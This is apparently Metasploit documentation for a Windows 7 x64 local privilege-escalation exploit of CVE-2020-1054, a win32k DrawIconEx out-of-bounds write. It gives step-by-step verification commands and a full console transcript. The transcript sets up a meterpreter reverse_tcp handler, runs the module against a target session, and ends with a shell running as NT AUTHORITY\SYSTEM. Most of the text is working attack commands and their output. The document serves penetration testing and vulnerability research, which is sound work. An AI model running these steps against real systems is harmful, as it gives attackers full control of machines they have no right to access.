## Vulnerable Application

This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx
within win32k. The out of bounds write can be used to overwrite the pvbits of a
SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel
memory, an attacker can gain arbitrary code execution as the SYSTEM user.

This module has been tested against a fully updated Windows 7 x64 SP1. Offsets
within the exploit code may need to be adjusted to work with other versions of
Windows.

## Verification Steps

1. Get a non-SYSTEM meterpreter session on Windows 7 SP1 x64
1. `use exploit/windows/local/cve_2020_1054_drawiconex_lpe`
1. `set session <session>`
1. `set payload windows/x64/meterpreter/reverse_tcp`
1. `set LHOST <LHOST>`
1. `set LPORT 5555`
1. `exploit`
1. Get a SYSTEM session

## Scenarios

### Windows 7 SP1 x64 with win32k.sys Version 6.1.7601.24542

```
$ msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.13.37; set lport 4444; set ExitOnSession false; run -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
lhost => 192.168.13.37
lport => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.13.37:4444
msf6 exploit(multi/handler) > [*] Sending stage (200262 bytes) to 192.168.13.106
[*] Meterpreter session 1 opened (192.168.13.37:4444 -> 192.168.13.106:49216) at 2020-11-26 13:56:39 +0000

msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_1054_drawiconex_lpe
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > set LPORT 5555
LPORT => 5555
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > run

[*] Started reverse TCP handler on 192.168.13.37:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing exploit...
[*] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.13.106
[*] Meterpreter session 2 opened (192.168.13.37:5555 -> 192.168.13.106:49217) at 2020-11-26 13:57:08 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

